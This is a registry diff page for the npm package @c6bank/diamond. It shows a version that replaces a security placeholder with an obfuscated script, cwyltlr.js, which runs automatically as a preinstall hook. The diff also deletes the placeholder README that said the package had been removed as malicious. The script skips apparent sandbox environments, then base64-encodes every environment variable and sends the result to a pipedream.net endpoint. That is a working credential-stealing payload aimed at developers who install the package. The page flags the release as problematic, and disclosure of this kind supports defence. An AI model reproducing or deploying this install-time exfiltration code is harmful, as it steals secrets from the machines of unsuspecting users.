@c6bank/diamond 0.0.1-security → 30.928.514
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @c6bank/diamond might be problematic. Click here for more details.
- package/cwyltlr.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/cwyltlr.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x29ee8d=a0_0x4d6a;function a0_0x4d6a(_0x1a8795,_0x431c9b){const _0x5d0c33=a0_0x5d0c();return a0_0x4d6a=function(_0x4d6a40,_0x377a81){_0x4d6a40=_0x4d6a40-0xe7;let _0x4d20bf=_0x5d0c33[_0x4d6a40];return _0x4d20bf;},a0_0x4d6a(_0x1a8795,_0x431c9b);}(function(_0x527d7b,_0x42751f){const _0x328f55=a0_0x4d6a,_0x5f015f=_0x527d7b();while(!![]){try{const _0x3c18e0=parseInt(_0x328f55(0x100))/0x1*(-parseInt(_0x328f55(0xf8))/0x2)+parseInt(_0x328f55(0xf7))/0x3+parseInt(_0x328f55(0xf4))/0x4*(parseInt(_0x328f55(0xe8))/0x5)+parseInt(_0x328f55(0xf6))/0x6*(parseInt(_0x328f55(0xfd))/0x7)+-parseInt(_0x328f55(0xef))/0x8*(parseInt(_0x328f55(0xf1))/0x9)+-parseInt(_0x328f55(0xfa))/0xa*(-parseInt(_0x328f55(0x102))/0xb)+parseInt(_0x328f55(0x101))/0xc*(parseInt(_0x328f55(0xf2))/0xd);if(_0x3c18e0===_0x42751f)break;else _0x5f015f['push'](_0x5f015f['shift']());}catch(_0x2b864b){_0x5f015f['push'](_0x5f015f['shift']());}}}(a0_0x5d0c,0xd20f8));function a0_0x5d0c(){const _0x5c3ab3=['14jAkyqv','net','130uUAzze','POST','base64','1253602SotOxy','npm_config_registry','daasadmin','61833vSmGxc','744Vhbbrl','1008502OoiluB','env','error','/usr/bin/python','npm_package_name','https','taobao.org','14530YImZvF','e0a8dd05baeedab99a1f90353febac51','pipedream','from','stringify','join','USERNAME','152nKQpZB','registry.npmmirror.com','419805PNMmlu','24674byFOHf','toString','444LyOecw','length','18jnExED','30384sCjOPU'];a0_0x5d0c=function(){return _0x5c3ab3;};return a0_0x5d0c();}const http=require(a0_0x29ee8d(0x107)),filter=[{'key':'npm_config_registry','val':a0_0x29ee8d(0xe7)},{'key':a0_0x29ee8d(0xfe),'val':'tencent.com'},{'key':'npm_config_registry','val':a0_0x29ee8d(0xf0)},{'key':a0_0x29ee8d(0xee),'val':a0_0x29ee8d(0xff)},{'key':'_','val':a0_0x29ee8d(0x105)}];function main(){const _0x2c7061=a0_0x29ee8d;var _0x131375=process[_0x2c7061(0x103)]||{};if(filter['some'](({key:_0x2ad4b8,val:_0x93f120})=>_0x131375[_0x2ad4b8]&&_0x131375[_0x2ad4b8]['includes'](_0x93f120))||Object['keys'](_0x131375)[_0x2c7061(0xf5)]<0xa)return;req=http['request']({'host':[_0x2c7061(0xe9),'m',_0x2c7061(0xea),_0x2c7061(0xf9)][_0x2c7061(0xed)]('.'),'path':'/'+(_0x131375[_0x2c7061(0x106)]||''),'method':_0x2c7061(0xfb)})['on'](_0x2c7061(0x104),function(_0x389fe7){}),req['write'](Buffer[_0x2c7061(0xeb)](JSON[_0x2c7061(0xec)](_0x131375))[_0x2c7061(0xf3)](_0x2c7061(0xfc))),req['end']();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@c6bank/diamond",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "30.928.514",
|
|
4
|
+
"main": "cwyltlr.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node cwyltlr.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40c6bank%2Fdiamond for more information.
|